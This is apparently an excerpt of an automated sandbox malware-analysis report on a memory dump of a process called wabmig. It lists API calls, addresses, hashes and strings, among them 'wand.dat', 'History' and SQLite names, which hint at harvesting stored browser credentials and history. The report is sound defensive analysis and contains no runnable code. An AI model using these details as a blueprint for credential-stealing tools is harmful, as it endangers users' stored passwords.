• Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
• Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
• Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                            APIs
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                            • memset.MSVCRT ref: 004450CD
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                            • String ID:
                                                                            • API String ID: 1471605966-0
                                                                            APIs
                                                                            • wcscpy.MSVCRT ref: 0044475F
                                                                            • wcscat.MSVCRT ref: 0044476E
                                                                            • wcscat.MSVCRT ref: 0044477F
                                                                            • wcscat.MSVCRT ref: 0044478E
                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                            • String ID: \StringFileInfo\
                                                                            • API String ID: 102104167-2245444037
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _memicmpwcslen
                                                                            • String ID: @@@@$History
                                                                            • API String ID: 1872909662-685208920
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004100FB
                                                                            • memset.MSVCRT ref: 00410112
                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                            • String ID: </%s>
                                                                            • API String ID: 3400436232-259020660
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040D58D
                                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                            • String ID: caption
                                                                            • API String ID: 1523050162-4135340389
                                                                            APIs
                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                            • String ID: MS Sans Serif
                                                                            • API String ID: 210187428-168460110
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_wcsicmpmemset
                                                                            • String ID: edit
                                                                            • API String ID: 2747424523-2167791130
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                                            • API String ID: 3150196962-1506664499
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memcmp
                                                                            • String ID:
                                                                            • API String ID: 3384217055-0
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$memcpy
                                                                            • String ID:
                                                                            • API String ID: 368790112-0
                                                                            APIs
                                                                              • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                                                                              • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                                                                              • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                                                                              • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                                                                            • GetMenu.USER32(?), ref: 00410F8D
                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9A
                                                                            • GetSubMenu.USER32(00000000), ref: 00410F9D
                                                                            • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$ItemMessageSend$CheckEnableRadio
                                                                            • String ID:
                                                                            • API String ID: 1889144086-0
                                                                            APIs
                                                                            • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                                                                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                                                                            • GetLastError.KERNEL32 ref: 0041810A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00418120
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$CloseCreateErrorHandleLastMappingView
                                                                            • String ID:
                                                                            • API String ID: 1661045500-0
                                                                            APIs
                                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                            Strings
                                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                            • API String ID: 1297977491-2063813899
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040560C
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                            • String ID: *.*$dat$wand.dat
                                                                            • API String ID: 2618321458-1828844352
                                                                            APIs
                                                                              • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                              • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                            • wcslen.MSVCRT ref: 00410C74
                                                                            • _wtoi.MSVCRT(?), ref: 00410C80
                                                                            • _wcsicmp.MSVCRT ref: 00410CCE
                                                                            • _wcsicmp.MSVCRT ref: 00410CDF
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                            • String ID:
                                                                            • API String ID: 1549203181-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00412057
                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                            • String ID:
                                                                            • API String ID: 3550944819-0
                                                                            APIs
                                                                            • free.MSVCRT ref: 0040F561
                                                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$free
                                                                            • String ID: g4@
                                                                            • API String ID: 2888793982-2133833424
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: @
                                                                            • API String ID: 3510742995-2766056989
                                                                            APIs
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
                                                                            • memset.MSVCRT ref: 0040AF18
                                                                            • memcpy.MSVCRT(0045A474,?,?,00000000,00000000,?,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@??3@memcpymemset
                                                                            • String ID:
                                                                            • API String ID: 1865533344-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004144E7
                                                                              • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                              • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                            • memset.MSVCRT ref: 0041451A
                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                            • String ID:
                                                                            • API String ID: 1127616056-0
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
                                                                            • memset.MSVCRT ref: 0042FED3
                                                                            • memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID: sqlite_master
                                                                            • API String ID: 438689982-3163232059
                                                                            APIs
                                                                            • SHGetMalloc.SHELL32(?), ref: 00414D9A
                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
                                                                            • wcscpy.MSVCRT ref: 00414DF3
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: BrowseFolderFromListMallocPathwcscpy
                                                                            • String ID:
                                                                            • API String ID: 3917621476-0
                                                                            APIs
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                            • _snwprintf.MSVCRT ref: 00410FE1
                                                                            • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                            • _snwprintf.MSVCRT ref: 0041100C
                                                                            • wcscat.MSVCRT ref: 0041101F
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                            • String ID:
                                                                            • API String ID: 822687973-0
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,774CDF80,?,0041755F,?), ref: 00417452
                                                                            • malloc.MSVCRT ref: 00417459
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,774CDF80,?,0041755F,?), ref: 00417478
                                                                            • free.MSVCRT ref: 0041747F
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$freemalloc
                                                                            • String ID:
                                                                            • API String ID: 2605342592-0
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                            • RegisterClassW.USER32(?), ref: 00412428
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                            • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModule$ClassCreateRegisterWindow
                                                                            • String ID:
                                                                            • API String ID: 2678498856-0
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Item
                                                                            • String ID:
                                                                            • API String ID: 3888421826-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00417B7B
                                                                            • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                            • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                            • GetLastError.KERNEL32 ref: 00417BB5
                                                                            Similarity
                                                                            • API ID: File$ErrorLastLockUnlockmemset
                                                                            • String ID:
                                                                            • API String ID: 3727323765-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F673
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                            • strlen.MSVCRT ref: 0040F6A2
                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040F6E2
                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                            • strlen.MSVCRT ref: 0040F70D
                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00402FD7
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                            • strlen.MSVCRT ref: 00403006
                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                            Similarity
                                                                            • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 2754987064-0
                                                                            APIs
                                                                              • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                              • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                              • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                            • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                            • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                            • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                            Similarity
                                                                            • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                            • String ID:
                                                                            • API String ID: 764393265-0
                                                                            APIs
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                            • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                            • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                            Similarity
                                                                            • API ID: Time$System$File$LocalSpecific
                                                                            • String ID:
                                                                            • API String ID: 979780441-0
                                                                            APIs
                                                                            • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                            • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                            • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                            Similarity
                                                                            • API ID: memcpy$DialogHandleModuleParam
                                                                            • String ID:
                                                                            • API String ID: 1386444988-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                            • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: InvalidateMessageRectSend
                                                                            • String ID: d=E
                                                                            • API String ID: 909852535-3703654223
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 0040F79E
                                                                            • wcschr.MSVCRT ref: 0040F7AC
                                                                              • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                              • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: wcschr$memcpywcslen
                                                                            • String ID: "
                                                                            • API String ID: 1983396471-123907689
                                                                            APIs
                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                            • _memicmp.MSVCRT ref: 0040C00D
